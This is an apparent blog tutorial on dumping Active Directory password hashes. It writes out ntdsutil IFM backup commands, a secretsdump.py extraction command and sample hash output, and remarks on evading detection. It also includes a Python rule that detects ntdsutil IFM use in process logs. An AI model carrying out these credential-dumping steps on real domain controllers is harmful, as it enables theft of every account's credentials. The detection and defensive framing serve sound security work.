Gaining access to Windows Domain Controller password hashes is a critical step for attackers aiming to compromise a Windows network.
Step 1: Obtain NTDS.dit and SYSTEM Registry Hive Data
NTDS.dit is the database that stores Active Directory (AD) data, including password hashes. To extract these hashes, attackers also need the SYSTEM registry hive, which holds the boot key used to decrypt the password encryption key (PEK) that protects the hashes inside NTDS.dit.
Using ntdsutil.exe
Access ntdsutil.exe: This built-in utility is used to manage AD data, including creating backups.
Activate Instance: Set the active instance to "ntds".
Create Backup:
C:\Users\Administrator> ntdsutil
ntdsutil: activate instance ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: create full c:\ntds
This sequence of commands creates a full Install From Media (IFM) backup of the AD data in the c:\ntds directory, which includes the NTDS.dit file (under Active Directory\) and the SYSTEM registry hive (under registry\).
Step 2: Extracting Password Hashes
After obtaining the NTDS.dit and SYSTEM files, the next step is to decrypt the NTDS.dit data and extract the password hashes.
Using secretsdump.py from Impacket
Install Impacket: Ensure that Impacket is installed on the attacker’s machine.
Run secretsdump.py: This script reads and decrypts the NTDS.dit file using the SYSTEM registry hive. Command for secretsdump.py:
python /usr/share/doc/python-impacket/examples/secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL
The output shows the decrypted hashes:
[*] Target system bootKey: 0x7b1c658edfb752594c688e02d4424924
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient.
[*] Pek found and decrypted: 0x1e0d9fa12fb2367f15f22517aa31e84d
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9491b24e8c931559455ed4f59476cec2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d2f4f1a07e9fb731e455e0b9a58265:::
ksmith:1000:aad3b435b51404eeaad3b435b51404ee:0d4fa3ed8f51a0d45a7c7fbd0c92b99c:::
Minimizing Detection
Attackers prefer using built-in tools like ntdsutil because they are less likely to trigger security alerts compared to third-party tools. The built-in utilities are designed for system management and backups, thus their usage might not immediately raise suspicion.
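As an added example (not from the original post), here is a small Python detection rule run over constructed process-creation log lines (Security 4688 / Sysmon ID 1 style): it flags ntdsutil launches, rates command lines carrying the IFM "create full" sequence as high severity, and also flags a bare interactive "ntdsutil" launch, because sub-commands typed at the prompt (as in the session above) never reach the process command line. The pipe-delimited log format, host names, users and paths are assumptions made for this example.

```python
import re
from collections import namedtuple

# Constructed sample process-creation events (Security 4688 / Sysmon ID 1 style),
# flattened here to "time|host|user|image|commandline"; hosts, users and paths are made up.
SAMPLE_EVENTS = """\
2024-05-01T02:14:07Z|DC01|CORP\\svc-backup|C:\\Windows\\System32\\ntdsutil.exe|ntdsutil "ac i ntds" ifm "create full c:\\ntds" q q
2024-05-01T02:14:09Z|DC01|CORP\\svc-backup|C:\\Windows\\System32\\ntdsutil.exe|ntdsutil "activate instance ntds" ifm "create full c:\\ntds" q q
2024-05-01T09:00:00Z|DC01|CORP\\jdoe|C:\\Windows\\System32\\ntdsutil.exe|ntdsutil
2024-05-01T09:05:00Z|WS07|CORP\\jdoe|C:\\Windows\\System32\\notepad.exe|notepad.exe c:\\notes\\ifm.txt
2024-05-01T11:30:00Z|DC02|CORP\\adadmin|C:\\Windows\\System32\\ntdsutil.exe|ntdsutil "ac i ntds" ifm "create sysvol full d:\\backup" q q
"""

# ntdsutil accepts abbreviated commands, so match the long and short spellings.
ACTIVATE_NTDS = re.compile(r"\b(?:ac|activate)\s+(?:i|instance)\s+ntds\b", re.I)
IFM_MENU = re.compile(r"\bifm\b", re.I)
CREATE_MEDIA = re.compile(r"\bcreate\s+(?:sysvol\s+)?full\b", re.I)

Alert = namedtuple("Alert", "time host user severity reason")

def parse_events(text):
    """Yield one dict per non-empty pipe-delimited log line."""
    for line in text.splitlines():
        if line.strip():
            time, host, user, image, cmd = line.split("|", 4)
            yield {"time": time, "host": host, "user": user, "image": image, "cmd": cmd}

def detect_ntdsutil_ifm(events):
    """Flag every ntdsutil execution; IFM media creation is rated high severity."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("\\ntdsutil.exe"):
            continue  # only the built-in utility is in scope for this rule
        hits = [name for name, rx in (("activate instance ntds", ACTIVATE_NTDS),
                                      ("ifm", IFM_MENU), ("create full", CREATE_MEDIA))
                if rx.search(ev["cmd"])]
        if hits:
            alerts.append(Alert(ev["time"], ev["host"], ev["user"], "high",
                                "ntdsutil IFM media creation: " + ", ".join(hits)))
        else:
            # Interactive use (as in the session on this page) logs only "ntdsutil";
            # the sub-commands typed at the prompt never appear in event 4688.
            alerts.append(Alert(ev["time"], ev["host"], ev["user"], "medium",
                                "ntdsutil started without arguments; review the session"))
    return alerts

if __name__ == "__main__":
    for a in detect_ntdsutil_ifm(parse_events(SAMPLE_EVENTS)):
        print(f"{a.time} {a.host} {a.user} [{a.severity}] {a.reason}")
```

Running it on the constructed events yields three high-severity alerts (the two scripted IFM backups on DC01 and the SYSVOL variant on DC02) and one medium-severity alert for the bare interactive launch; the notepad event is ignored.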
Alternative Methods
There are other methods to obtain and extract NTDS.dit and SYSTEM data, such as using volume shadow copies or other administrative tools. Detailed methodologies and advanced techniques can be found in various penetration testing blogs and resources, such as the articles by @netbiosX on PentestLab.
Conclusion
Obtaining and decrypting Windows Domain Controller password hashes involves using built-in utilities to create backups of the necessary files and then employing scripts like secretsdump.py to extract the hashes. Understanding these methods highlights the importance of securing administrative access and monitoring the use of system utilities to prevent unauthorized access to sensitive data.
We will continue this in the next post.
Akash Patel